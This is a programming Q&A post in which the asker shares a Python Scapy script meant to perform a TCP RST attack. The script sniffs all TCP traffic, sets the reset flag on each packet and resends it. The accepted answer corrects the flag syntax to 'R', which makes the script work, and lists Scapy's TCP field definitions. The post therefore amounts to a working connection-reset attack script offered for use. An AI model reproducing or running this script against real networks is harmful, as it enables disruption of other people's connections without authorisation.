# Scapy TCP RST atack

Tags: python, tcp, scapy

I tried to write TCP RST atack with Scapy,but my code doesn't work.Please,help me to solve my problem.

```
     from scapy.all import *

     def poison(packet):
         packet[TCP].flags='RST'
         sendp(packet)

     sniff(filter='tcp',prn=poison)
```

There's something wrong with `flags`,I think.There's an error:

> Traceback (most recent call last):
>   File "Univer.py", line 6, in
>   
>        sniff(filter='tcp',prn=poison)
>   File "/usr/lib/pymodules/python2.6/scapy/sendrecv.py", line 559, in sniff
>        r = prn(p)
>   File "Univer.py", line 3, in poison
>        packet[TCP].flags='RST'
>   File "/usr/lib/pymodules/python2.6/scapy/packet.py", line 186, in
>   **setattr**
>        self.setfieldval(attr,val)
>   File "/usr/lib/pymodules/python2.6/scapy/packet.py", line 175, in
>   setfieldval
>        self.fields[attr] = any2i(self, val)
>   File "/usr/lib/pymodules/python2.6/scapy/fields.py", line 785, in any2i
>        y |= 1 << self.names.index(i)
>
> ValueError: substring not found

Answer (score 6, accepted):

The correct way to set the TCP flags in Scapy is to use the short (one letter) form `packet[TCP].flags = 'R'`. With the current development version of Scapy, you can get the accepted flags using `ls()`:

```
>>> ls(TCP, verbose=True)
sport         : ShortEnumField           = (20)
dport        : ShortEnumField           = (80)
seq            : IntField                           = (0)
ack            : IntField                            = (0)
dataofs    : BitField (4 bits)               = (None)
reserved  : BitField (3 bits)               = (0)
flags          : FlagsField (9 bits)          = (2)
               F, S, R, P, A, U, E, C, N
window    : ShortField                        = (8192)
chksum    : XShortField                      = (None)
urgptr       : ShortField                        = (0)
options     : TCPOptionsField            = ({})
```